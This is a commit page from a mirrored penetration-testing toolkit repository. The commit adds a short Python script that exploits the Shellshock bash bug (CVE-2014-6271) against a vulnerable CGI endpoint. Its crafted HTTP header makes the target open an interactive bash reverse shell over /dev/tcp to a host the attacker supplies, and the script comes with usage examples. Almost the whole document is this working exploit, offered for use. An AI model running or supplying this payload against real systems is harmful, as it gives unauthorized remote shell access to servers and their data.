mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-05-05 08:15:04 -04:00
Reorganized
This commit is contained in:
parent
ab54dc8e70
commit
2afd831662
281 changed files with 253 additions and 33 deletions
21
Linux_Hacking/ShellShocker/scripts/cgi-bin-reverse-shell.py
Normal file
21
Linux_Hacking/ShellShocker/scripts/cgi-bin-reverse-shell.py
Normal file
|
@ -0,0 +1,21 @@
|
|||
#
|
||||
#CVE-2014-6271 cgi-bin reverse shell
|
||||
#
|
||||
|
||||
import httplib,urllib,sys
|
||||
|
||||
if (len(sys.argv)<4):
|
||||
print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
|
||||
print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
|
||||
exit(0)
|
||||
|
||||
conn = httplib.HTTPConnection(sys.argv[1])
|
||||
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]
|
||||
|
||||
headers = {"Content-type": "application/x-www-form-urlencoded",
|
||||
"test":reverse_shell }
|
||||
conn.request("GET",sys.argv[2],headers=headers)
|
||||
res = conn.getresponse()
|
||||
print res.status, res.reason
|
||||
data = res.read()
|
||||
print data
|
Loading…
Add table
Add a link
Reference in a new issue